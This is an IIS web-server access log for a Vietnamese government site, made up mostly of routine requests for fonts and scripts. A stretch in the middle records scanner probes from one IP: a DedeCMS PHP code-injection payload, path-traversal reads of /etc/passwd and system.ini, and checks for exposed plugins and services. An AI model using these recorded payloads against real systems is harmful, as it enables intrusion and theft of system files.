Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 177 2023-06-27 16:25:50 103.153.214.94 GET /40d36b4a-60c6-460a-bf43-4c948c23563e.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 182 2023-06-27 16:25:50 103.153.214.94 GET /45b78f45-e639-4836-8612-e0892e120f14.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 178 2023-06-27 16:25:52 103.153.214.94 GET /281f890c-8412-4ee3-84ed-8b5d062d2ab8.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 370 2023-06-27 16:25:52 103.153.214.94 GET /5729f02e-f6b0-4f35-8ee5-c2cffa65fa76.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 349 2023-06-27 16:25:52 103.153.214.94 GET /1fed34fa-250a-4d32-9f1d-42f978a2e0b2.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 177 2023-06-27 16:25:53 103.153.214.94 GET /e57662ff-b1ef-4122-88c1-61bbdabeb365.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 824 2023-06-27 16:25:53 103.153.214.94 GET /2200dfff-da50-40b0-bc12-5e4b872a1998.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 348 2023-06-27 16:25:53 103.153.214.94 GET /dc10b3bd-5076-4df5-a5f5-e5961f4a6938.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 538 2023-06-27 16:25:55 103.153.214.94 GET /2a1ae9a5-b6b5-405c-b660-bbdf1b356952.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1221 2023-06-27 16:25:55 103.153.214.94 GET /a8aeea1b-1a9d-45b7-8ad9-7c71824599e2.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 699 2023-06-27 16:25:56 103.153.214.94 GET /6ea5fa46-5311-450b-8744-288a30c55348.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 353 2023-06-27 16:25:57 103.153.214.94 GET /d9e4040d-32ff-4a1c-ac04-927a781da1f5.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1215 2023-06-27 16:25:58 103.153.214.94 GET /97694c53-4e94-4f9e-969b-a148adfcdcfd.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 937 2023-06-27 16:26:00 103.153.214.94 GET /8b01637a-f445-4f10-92ea-b84a355f7690.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1447 2023-06-27 16:26:00 103.153.214.94 GET /31da4b04-f98a-4b5f-b545-a31d26da99e5.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 349 2023-06-27 16:26:00 103.153.214.94 GET /d98fb015-7ef6-404f-a58a-5c9242d79770.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 349 2023-06-27 16:26:01 103.153.214.94 GET /32a2c5cf-6736-44a6-a276-49ba7e030944.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 357 2023-06-27 16:26:01 103.153.214.94 GET /fa71df11-7b19-4baf-8ff7-3537dea718f0.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 349 2023-06-27 16:26:02 103.153.214.94 GET /a9eaf4d3-6427-42df-9306-3ea1270f7b1a.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 694 2023-06-27 16:26:02 103.153.214.94 GET /f4a085c3-1c64-4fc0-a598-26f3e658c2b0.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 350 2023-06-27 16:26:02 103.153.214.94 GET /94aa531e-7746-4df0-bb6e-349891f2eda5.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 349 2023-06-27 16:26:03 103.153.214.94 GET /121524c1-8d82-4155-bfb3-fd2f15f09e93.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 351 2023-06-27 16:26:03 103.153.214.94 GET /3ae1e25e-3aa6-4061-a016-a079159f9d65.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 360 2023-06-27 16:26:04 103.153.214.94 GET /f1799750-0952-403f-8108-b2402eed0f62.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 740 2023-06-27 16:26:04 103.153.214.94 GET /manager-manager-module-ngfactory-es5.js - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 39534 2023-06-27 16:26:04 103.153.214.94 GET /41331c3c-3759-4462-8695-33c9a21b6a5b.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 355 2023-06-27 16:26:04 103.153.214.94 GET /31e0c094-e345-4a54-a797-d5f1a5885572.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 350 2023-06-27 16:26:05 103.153.214.94 GET /c4cc9032-7eee-4a6e-ae8b-f384b1349bcf.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 350 2023-06-27 16:26:05 103.153.214.94 GET /1b3078ef-2971-4c95-b6ca-13ab528758cb.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 349 2023-06-27 16:26:06 103.153.214.94 GET /c1905e2e-a1cb-49de-9bb0-ce3c5ffc85ae.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 743 2023-06-27 16:26:07 103.153.214.94 GET /341bcc5e-7ac0-44ff-819d-5887892eab1b.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1043 2023-06-27 16:26:07 103.153.214.94 GET /18629a56-2ec3-4470-a65f-f82d7ec4d41b.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 355 2023-06-27 16:26:07 103.153.214.94 GET /439a2ded-d7a4-42d4-8660-ef8765fa7486.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 352 2023-06-27 16:26:08 103.153.214.94 GET /4daa2125-53c6-4da8-9614-8a1049eaccc2.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 356 2023-06-27 16:26:08 103.153.214.94 GET /0763eab1-d6ed-4c73-afb0-895f930df099.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 829 2023-06-27 16:26:10 103.153.214.94 GET /CalciteWebCoreIcons.ttf iz9r4h 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 529 2023-06-27 16:26:11 103.153.214.94 GET /CalciteWebCoreIcons.woff iz9r4h 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1218 2023-06-27 16:26:13 103.153.214.94 GET /CalciteWebCoreIcons.svg iz9r4h 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 2462 2023-06-27 16:26:13 103.153.214.94 GET /loading-throb.gif - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 179 2023-06-27 16:26:13 103.153.214.94 GET /basemap-toggle-64.svg - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 176 2023-06-27 16:26:13 103.153.214.94 GET /transparent-bg.png - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 179 2023-06-27 16:26:15 103.153.214.94 GET /Loading_Indicator_double_32.svg - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 953 2023-06-27 16:26:29 103.153.214.94 GET /favicon.ico - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 14202 2023-06-27 16:29:25 103.153.214.94 POST /thruk/cgi-bin/login.cgi - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 31 2023-06-27 16:37:40 103.153.214.94 GET /wp-content/plugins/easy-wp-smtp/ - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 60 2023-06-27 16:37:40 103.153.214.94 GET /wp-content/plugins/wp-mail-smtp-pro/ - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 40 2023-06-27 16:47:45 103.153.214.94 GET /tag_test_action.php partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}&token&url=a 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 37 2023-06-27 16:48:51 103.153.214.94 GET /wgarcmin.cgi DOC=../../../../etc/passwd&ID=1&NEXTPAGE=D 443 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 35 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 17:07:42 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 17:07:42 103.153.214.94 GET /v2/keys/ - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 43 2023-06-27 17:09:47 103.153.214.94 GET /jobmanager/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 11 0 26 2023-06-27 17:14:05 103.153.214.94 GET /download/C:/windows/system.ini - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 39 2023-06-27 17:24:29 103.153.214.94 GET / - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 265 2023-06-27 17:24:29 103.153.214.94 GET /runtime-es5.js - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 262 2023-06-27 17:24:31 103.153.214.94 GET /polyfills-es5.js - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 816 2023-06-27 17:24:31 103.153.214.94 GET /styles-es5.js - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 567 2023-06-27 17:24:33 103.153.214.94 GET /vendor-es5.js - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1823 2023-06-27 17:24:37 103.153.214.94 GET /main-es5.js - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 2200 2023-06-27 17:24:49 103.153.214.94 GET /data-table.eot - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 257 2023-06-27 17:24:49 103.153.214.94 GET /data-table.eot - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 249 2023-06-27 17:24:51 103.153.214.94 GET /data-table.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 264 2023-06-27 17:24:51 103.153.214.94 GET /data-table.ttf - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 258 2023-06-27 17:24:53 103.153.214.94 GET /data-table.svg - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 250 2023-06-27 17:24:53 103.153.214.94 GET /~@swimlane/ngx-datatable/index.css - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 256 2023-06-27 17:24:53 103.153.214.94 GET /~@swimlane/ngx-datatable/themes/material.scss - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 258 2023-06-27 17:24:54 103.153.214.94 GET /~@swimlane/ngx-datatable/assets/icons.css - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 257 2023-06-27 17:24:54 103.153.214.94 GET /77156710-6a58-4606-b189-b4185e75967b.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 248 2023-06-27 17:24:55 103.153.214.94 GET /3d5260a1-e4cd-4567-80ed-69d23c40355f.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 821 2023-06-27 17:24:55 103.153.214.94 GET /77caabd3-1877-4634-85c8-8e398a093b99.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 261 2023-06-27 17:24:55 103.153.214.94 GET /e388ac99-8c6a-4451-8690-1d15b4d45adb.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 267 2023-06-27 17:24:56 103.153.214.94 GET /014f2daa-c310-4a36-b9fd-79a8e0c48d44.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 252 2023-06-27 17:24:56 103.153.214.94 GET /12b00842-ec20-4c7f-aa72-802fb00f6cc4.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 252 2023-06-27 17:24:57 103.153.214.94 GET /b0b84e4d-2164-45c7-a674-1662f19f3ba6-basic.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 260 2023-06-27 17:24:57 103.153.214.94 GET /e91d1bbf-3fea-45e2-b003-a22b12ce6e5f-basic.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 258 2023-06-27 17:24:59 103.153.214.94 GET /e78b17bb-11fb-4860-8d66-4ee0d0c1e117.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 253 2023-06-27 17:24:59 103.153.214.94 GET /d4ffabb3-dd7c-472a-bdfb-6700383c6354.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 261 2023-06-27 17:24:59 103.153.214.94 GET /77156710-6a58-4606-b189-b4185e75967b-ext.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 261 2023-06-27 17:25:00 103.153.214.94 GET /3d5260a1-e4cd-4567-80ed-69d23c40355f-ext.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 264 2023-06-27 17:25:00 103.153.214.94 GET /manager-manager-module-ngfactory-es5.js - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 21887 2023-06-27 17:25:00 103.153.214.94 GET /77caabd3-1877-4634-85c8-8e398a093b99-ext.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 254 2023-06-27 17:25:00 103.153.214.94 GET /e388ac99-8c6a-4451-8690-1d15b4d45adb-ext.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 258 2023-06-27 17:25:01 103.153.214.94 GET /014f2daa-c310-4a36-b9fd-79a8e0c48d44-ext.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 252 2023-06-27 17:25:01 103.153.214.94 GET /12b00842-ec20-4c7f-aa72-802fb00f6cc4-ext.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 255 2023-06-27 17:25:01 103.153.214.94 GET /b0b84e4d-2164-45c7-a674-1662f19f3ba6-ext.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 247 2023-06-27 17:25:02 103.153.214.94 GET /e91d1bbf-3fea-45e2-b003-a22b12ce6e5f-ext.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 269 2023-06-27 17:25:02 103.153.214.94 GET /e78b17bb-11fb-4860-8d66-4ee0d0c1e117-ext.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 254 2023-06-27 17:25:03 103.153.214.94 GET /d4ffabb3-dd7c-472a-bdfb-6700383c6354-ext.woff - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1064 2023-06-27 17:25:03 103.153.214.94 GET /77156710-6a58-4606-b189-b4185e75967b-greek.woff2 - 443 - 199.167.29.91 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 248 